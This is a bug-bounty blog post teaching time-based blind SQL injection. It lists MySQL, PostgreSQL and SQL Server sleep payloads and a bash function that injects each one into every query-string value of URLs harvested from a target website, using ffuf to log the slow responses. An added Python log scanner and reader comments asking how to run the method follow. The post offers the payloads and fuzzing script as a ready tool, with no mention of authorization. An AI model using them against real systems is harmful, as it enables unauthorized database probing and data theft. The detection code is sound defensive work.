Time-Based SQL Injection with ffuf

Tools

  • First, install the latest version of Go
  • ffuf | go get -u github.com/ffuf/ffuf
  • qsreplace | go get -u github.com/tomnomnom/qsreplace

PAYLOADS

XOR(if(now()=sysdate(),sleep(5),0))OR%27
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/
%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z
1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337
1%20or%20sleep(5)%23
%27%20WAITFOR%20DELAY%20%270:0:5%27--
%%27;SELECT%20PG_SLEEP(5)--
pg_sleep(5)
%27|%20|pg_sleep(5)--


Add this function to your .bashrc

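# Time-Based SQL Injection
# Usage: sqliTime <file of URLs with query strings, one per line>
sqliTime()
{
# Payload file: one payload per line, no whitespace (the loop splits on it)
for i in $(cat ~/.path/To/payloads) ; do
  # Replace every query-string value in the URL list with the current payload
  qsreplace "$i" < "$1" > sqli
  # -ft "<5000" filters out responses faster than 5000 ms, so only delayed ones are logged
  ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
  rm sqli
done
}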

Each time you want to use this function in your current shell or in a new terminal tab, run:

source .bashrc

Example Usage:

You can use any of these tools (gau, gauplus, or waybackurls) to collect URLs.

After collecting the URLs of the target website, run:

sqliTime urls
sqliTime urls.txt
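
From the defender's side, the payload families listed above leave a recognisable trace in web server access logs. The following is an added example, not code from the original post: it flags requests whose decoded query string carries a delay primitive and marks those where the response actually stalled. The log layout (request time in seconds as the last field), the function name scan and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Delay primitives from the payload families on this page:
# MySQL SLEEP(), PostgreSQL PG_SLEEP(), SQL Server WAITFOR DELAY.
DELAY_RE = re.compile(
    r"\bsleep\s*\(\s*\d|\bpg_sleep\s*\(\s*\d|\bwaitfor\s+delay\b", re.IGNORECASE)

# Assumed log layout: combined-style prefix, request time in seconds as last field.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ ([\d.]+)$')

# Constructed sample log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /item?id=1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27 HTTP/1.1" 200 512 5.012',
    '203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /search?q=1%20or%20sleep(5)%23 HTTP/1.1" 200 1840 0.041',
    '203.0.113.7 - - [10/Mar/2024:12:00:10 +0000] "GET /item?id=%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 310 0.030',
    '198.51.100.20 - - [10/Mar/2024:12:01:00 +0000] "GET /report?year=2023 HTTP/1.1" 200 90211 6.300',
    '198.51.100.21 - - [10/Mar/2024:12:01:05 +0000] "GET /blog?title=sleep+better HTTP/1.1" 200 4096 0.020',
    '203.0.113.7 - - [10/Mar/2024:12:02:00 +0000] "GET /p?id=1;SELECT%20PG_SLEEP(5)-- HTTP/1.1" 200 512 5.120',
]

def scan(lines, slow_seconds=5.0):
    """Return one finding per request whose query string carries a delay primitive."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # line does not follow the assumed layout
        client, target, _status, seconds = m.groups()
        parts = urlsplit(target)
        # Decode twice so double-encoded payloads are normalised as well.
        decoded = unquote_plus(unquote_plus(parts.query))
        hit = DELAY_RE.search(decoded)
        if hit:
            findings.append({
                "client": client,
                "path": parts.path,
                "primitive": hit.group(0).lower().split("(")[0].strip(),
                # Payload present AND response stalled: the delay probably executed.
                "delay_observed": float(seconds) >= slow_seconds,
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with delay_observed set to True means the database probably executed the delay, so that parameter should be triaged first and its query moved to parameterized statements. Slow benign requests and queries that merely contain the word "sleep" are not reported.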

Thanks for reading! I hope this helps. For more tips & methodology, follow

BOBBYTN

C|EHv11 | Bug hunter | Cyber Security Researcher | Ethical Hacker | Master in Social Engineering...

This Post Has 2 Comments

  1. movieripps

    I just found your blog and I am loving the content!
    I really want to try this Blind SQLi technique using ffuf.

    What do you mean by this part??

    “If you run this method every time or every new tab, You should enter,

    source .bashrc”

  2. Salman

    ffuf -w "urls.txt:URL" -w timebased.txt -u URLFUZZ -ft "<5000"

    What about this?
